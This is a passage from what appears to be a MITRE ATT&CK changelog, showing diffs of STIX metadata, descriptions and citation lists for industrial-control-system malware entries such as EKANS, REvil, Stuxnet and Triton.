>ther ransomware as it was written in Golang and aims to stop>ing energy, healthcare, and automotive manufacturing, which 
> services and processes related to Industrial Control System>in some cases resulted in significant operational disruption
>s.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS>s. [EKANS](https://attack.mitre.org/software/S0605) has used
>)> a hard-coded kill-list of processes, including some associa
 >ted with common ICS software platforms (e.g., GE Proficy, Ho
 >neywell HMIWeb, etc), similar to those defined in [MegaCorte
 >x](https://attack.mitre.org/software/S0576).(Citation: Drago
 >s EKANS)(Citation: Palo Alto Unit 42 EKANS)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 21:54:51.532000+00:002022-05-11 14:00:00.188000+00:00
description[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)
external_references[4]['description']Hinchliffe, A. Santos, D.. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.
x_mitre_version1.02.0

[S0372] LockerGoga

Current version: 2.0

Version changed from: 1.3 → 2.0


Old Description
New Description
t1[LockerGoga](https://attack.mitre.org/software/S0372) is rant1[LockerGoga](https://attack.mitre.org/software/S0372) is ran
>somware that has been tied to various attacks on European co>somware that was first reported in January 2019, and has bee
>mpanies. It was first reported upon in January 2019.(Citatio>n tied to various attacks on European companies, including i
>n: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga >ndustrial and manufacturing firms.(Citation: Unit42 LockerGo
>2019)>ga 2019)(Citation: CarbonBlack LockerGoga 2019)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Joe Slowik - Dragos']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:56:22.049000+00:002022-05-23 21:22:58.477000+00:00
description[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)
external_references[1]['source_name']Unit42 LockerGoga 2019CarbonBlack LockerGoga 2019
external_references[1]['description']Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.
external_references[1]['url']https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/
external_references[2]['source_name']CarbonBlack LockerGoga 2019Unit42 LockerGoga 2019
external_references[2]['description']CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.
external_references[2]['url']https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
x_mitre_version1.32.0

[S0496] REvil

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[REvil](https://attack.mitre.org/software/S0496) is a ransomt1[REvil](https://attack.mitre.org/software/S0496) is a ransom
>ware family that has been linked to the [GOLD SOUTHFIELD](ht>ware family that has been linked to the [GOLD SOUTHFIELD](ht
>tps://attack.mitre.org/groups/G0115) group and operated as r>tps://attack.mitre.org/groups/G0115) group and operated as r
>ansomware-as-a-service (RaaS) since at least April 2019. [RE>ansomware-as-a-service (RaaS) since at least April 2019. [RE
>vil](https://attack.mitre.org/software/S0496) is highly conf>vil](https://attack.mitre.org/software/S0496), which as been
>igurable and shares code similarities with the GandCrab RaaS> used against organizations in the manufacturing, transporta
>.(Citation: Secureworks REvil September 2019)(Citation: Inte>tion, and electric sectors, is highly configurable and share
>l 471 REvil March 2020)(Citation: Group IB Ransomware May 20>s code similarities with the GandCrab RaaS.(Citation: Secure
>20)>works REvil September 2019)(Citation: Intel 471 REvil March 
 >2020)(Citation: Group IB Ransomware May 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 19:38:51.122000+00:002022-05-24 21:09:01.019000+00:00
description[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)
external_references[3]['source_name']Secureworks REvil September 2019Talos Sodinokibi April 2019
external_references[3]['description']Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.
external_references[3]['url']https://www.secureworks.com/research/revil-sodinokibi-ransomwarehttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
external_references[4]['source_name']Intel 471 REvil March 2020Secureworks REvil September 2019
external_references[4]['description']Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[4]['url']https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/https://www.secureworks.com/research/revil-sodinokibi-ransomware
external_references[5]['source_name']Group IB Ransomware May 2020Cylance Sodinokibi July 2019
external_references[5]['description']Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[5]['url']https://www.group-ib.com/whitepapers/ransomware-uncovered.htmlhttps://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html
external_references[6]['source_name']Kaspersky Sodin July 2019Group IB Ransomware May 2020
external_references[6]['description']Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.
external_references[6]['url']https://securelist.com/sodin-ransomware/91473/https://www.group-ib.com/whitepapers/ransomware-uncovered.html
external_references[8]['source_name']Cylance Sodinokibi July 2019Intel 471 REvil March 2020
external_references[8]['description']Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.
external_references[8]['url']https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.htmlhttps://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
external_references[9]['source_name']Secureworks GandCrab and REvil September 2019Kaspersky Sodin July 2019
external_references[9]['description']Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.
external_references[9]['url']https://www.secureworks.com/blog/revil-the-gandcrab-connectionhttps://securelist.com/sodin-ransomware/91473/
external_references[10]['source_name']Talos Sodinokibi April 2019McAfee Sodinokibi October 2019
external_references[10]['description']Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
external_references[10]['url']https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.htmlhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/
external_references[11]['source_name']McAfee Sodinokibi October 2019Picus Sodinokibi January 2020
external_references[11]['description']McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.
external_references[11]['url']https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware
external_references[13]['source_name']Picus Sodinokibi January 2020Secureworks GandCrab and REvil September 2019
external_references[13]['description']Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
external_references[13]['url']https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomwarehttps://www.secureworks.com/blog/revil-the-gandcrab-connection
x_mitre_version1.22.0
Minor Version Changes

[S0604] Industroyer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence', 'Joe Slowik - Dragos']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 19:33:41.189000+00:002022-10-20 20:37:50.556000+00:00
x_mitre_version1.01.1

[S0607] KillDisk

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 14:18:07.086000+00:002022-05-11 14:00:00.188000+00:00
x_mitre_version1.01.1

[S0446] Ryuk

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 19:31:22.741000+00:002022-05-24 21:10:44.381000+00:00
external_references[2]['source_name']CrowdStrike Ryuk January 2019Bleeping Computer - Ryuk WoL
external_references[2]['description']Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.
external_references[2]['url']https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
external_references[4]['source_name']FireEye FIN6 Apr 2019CrowdStrike Ryuk January 2019
external_references[4]['description']McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.htmlhttps://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
external_references[5]['source_name']Bleeping Computer - Ryuk WoLFireEye FIN6 Apr 2019
external_references[5]['description']Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
external_references[5]['url']https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
x_mitre_version1.21.3
Other Version Changes

[S0603] Stuxnet

Current version: 1.2

Version changed from: 1.0 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:50:58.905000+00:002022-10-20 20:31:32.664000+00:00
external_references[2]['source_name']Symantec W.32 Stuxnet DossierCISA ICS Advisory ICSA-10-272-01
external_references[2]['description']Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.
external_references[2]['url']https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdfhttps://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01
external_references[3]['source_name']CISA ICS Advisory ICSA-10-272-01ESET Stuxnet Under the Microscope
external_references[3]['description']CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.
external_references[3]['url']https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf
external_references[4]['source_name']ESET Stuxnet Under the MicroscopeSymantec W.32 Stuxnet Dossier
external_references[4]['description']Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.
external_references[4]['url']https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdfhttps://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
x_mitre_version1.01.2
Metadata-only Changes

[S1000] ACAD/Medre.A

Current version: 1.0


Old Description
New Description
t1[ACAD/Medre.A](https://collaborate.mitre.org/attackics/indext1[ACAD/Medre.A](https://attack.mitre.org/software/S1000) is a
>.php/Software/S0018) is a worm that steals operational infor> worm that steals operational information. The worm collects
>mation. The worm collects AutoCAD files with drawings. ACAD/> AutoCAD files with drawings. [ACAD/Medre.A](https://attack.
>Medre.A has the capability to be used for industrial espiona>mitre.org/software/S1000) has the capability to be used for 
>ge.>industrial espionage.(Citation: ESET)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2020-01-02 00:14:20.652000+00:002022-10-12 17:15:44.068000+00:00
description[ACAD/Medre.A](https://collaborate.mitre.org/attackics/index.php/Software/S0018) is a worm that steals operational information. The worm collects AutoCAD files with drawings. ACAD/Medre.A has the capability to be used for industrial espionage.[ACAD/Medre.A](https://attack.mitre.org/software/S1000) is a worm that steals operational information. The worm collects AutoCAD files with drawings. [ACAD/Medre.A](https://attack.mitre.org/software/S1000) has the capability to be used for industrial espionage.(Citation: ESET)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Software/S0018https://attack.mitre.org/software/S1000
x_mitre_aliases[0]ACADACAD/Medre.A
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ESET', 'description': 'ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ', 'url': 'https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf'}
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_aliasesMedre.A

[S0606] Bad Rabbit

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 18:43:07.613000+00:002022-10-12 17:29:57.200000+00:00
external_references[1]['source_name']Secure List Bad RabbitESET Bad Rabbit
external_references[1]['description']Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.
external_references[1]['url']https://securelist.com/bad-rabbit-ransomware/82851/https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
external_references[2]['source_name']ESET Bad RabbitSecure List Bad Rabbit
external_references[2]['description']M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.
external_references[2]['url']https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/https://securelist.com/bad-rabbit-ransomware/82851/

[S0089] BlackEnergy

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 15:59:03.034000+00:002022-10-12 17:33:00.482000+00:00

[S0608] Conficker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 19:41:44.167000+00:002022-04-25 14:00:00.188000+00:00

[S0038] Duqu

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:07:19.052000+00:002022-04-25 14:00:00.188000+00:00

[S0143] Flame

Current version: 1.1


Old Description
New Description
t1Flame is a sophisticated toolkit that has been used to collet1[Flame](https://attack.mitre.org/software/S0143) is a sophis
>ct information since at least 2010, largely targeting Middle>ticated toolkit that has been used to collect information si
> East countries. (Citation: Kaspersky Flame)>nce at least 2010, largely targeting Middle East countries. 
 >(Citation: Kaspersky Flame)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:41:41.805000+00:002022-10-12 17:51:18.408000+00:00
descriptionFlame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)
external_references[2]['source_name']FlamersKyWIper
external_references[2]['description'](Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)
external_references[3]['source_name']sKyWIperFlamer
external_references[3]['description'](Citation: Kaspersky Flame) (Citation: Crysys Skywiper)(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)
external_references[5]['source_name']Symantec BeetlejuiceCrysys Skywiper
external_references[5]['description']Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
external_references[5]['url']https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothachehttps://www.crysys.hu/publications/files/skywiper.pdf
external_references[6]['source_name']Crysys SkywiperSymantec Beetlejuice
external_references[6]['description']sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.
external_references[6]['url']https://www.crysys.hu/publications/files/skywiper.pdfhttps://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

[S0368] NotPetya

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 19:31:47.185000+00:002022-04-25 14:00:00.188000+00:00

[S1006] PLC-Blaster

Current version: 1.0


Old Description
New Description
t1[PLC-Blaster](https://collaborate.mitre.org/attackics/index.t1[PLC-Blaster](https://attack.mitre.org/software/S1006) is a 
>php/Software/S0009) is a piece of proof-of-concept malware t>piece of proof-of-concept malware that runs on Siemens S7 PL
>hat runs on Siemens S7 PLCs. This worm locates other Siemens>Cs. This worm locates other Siemens S7 PLCs on the network a
> S7 PLCs on the network and attempts to infect them. Once th>nd attempts to infect them.  Once this worm has infected its
>is worm has infected its target and attempted to infect othe> target and attempted to infect other devices on the network
>r devices on the network, the worm can then run one of many >, the worm can then run one of many modules. (Citation: Spen
>modules.(Citation: BlackHat PLC-Blaster Mar 2016)(Citation: >neberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 20
>BlackHat PLC-Blaster 2016)>16) (Citation: Spenneberg, Ralf 2016) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2020-01-02 22:01:15.893000+00:002022-10-12 17:59:55.276000+00:00
description[PLC-Blaster](https://collaborate.mitre.org/attackics/index.php/Software/S0009) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules.(Citation: BlackHat PLC-Blaster Mar 2016)(Citation: BlackHat PLC-Blaster 2016)[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Software/S0009https://attack.mitre.org/software/S1006
external_references[1]['source_name']BlackHat PLC-Blaster 2016Spenneberg, Ralf 2016
external_references[1]['description']Spenneberg, Ralf, Maik Brüggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016', 'description': 'Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ', 'url': 'https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf'}

[S1009] Triton

Current version: 1.0


Old Description
New Description
t1[Triton](https://collaborate.mitre.org/attackics/index.php/St1[Triton](https://attack.mitre.org/software/S1009) is an atta
>oftware/S0013) is an attack framework built to interact with>ck framework built to interact with Triconex Safety Instrume
> Triconex Safety Instrumented System (SIS) controllers.(Cita>nted System (SIS) controllers. (Citation: Blake Johnson, Dan
>tion: FireEye TRITON Dec 2017)(Citation: Dragos TRISIS Dec 2> Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christo
>017)(Citation: CISA MAR-17-352-01 HatMan)(Citation: Schneide>pher Glyer December 2017) (Citation: Dragos December 2017) (
>r Electric TRITON Jan 2018)(Citation: Triton - A Report From>Citation: DHS CISA February 2019) (Citation: Schneider Elect
> The Trenches Mar 2019)(Citation: Schneider Electric Dec 201>ric January 2018) (Citation: Julian Gutmanis March 2019) (Ci
>8)(Citation: MidnightBlueLabs TRITON Jan 2018)>tation: Schneider December 2018) (Citation: Jos Wetzels Janu
 >ary 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2020-01-02 22:01:15.893000+00:002022-10-12 18:29:38.831000+00:00
description[Triton](https://collaborate.mitre.org/attackics/index.php/Software/S0013) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: FireEye TRITON Dec 2017)(Citation: Dragos TRISIS Dec 2017)(Citation: CISA MAR-17-352-01 HatMan)(Citation: Schneider Electric TRITON Jan 2018)(Citation: Triton - A Report From The Trenches Mar 2019)(Citation: Schneider Electric Dec 2018)(Citation: MidnightBlueLabs TRITON Jan 2018)[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: DHS CISA February 2019) (Citation: Schneider Electric January 2018) (Citation: Julian Gutmanis March 2019) (Citation: Schneider December 2018) (Citation: Jos Wetzels January 2018)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Software/S0013https://attack.mitre.org/software/S1009
external_references[1]['source_name']FireEye TRITON Dec 2017Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017
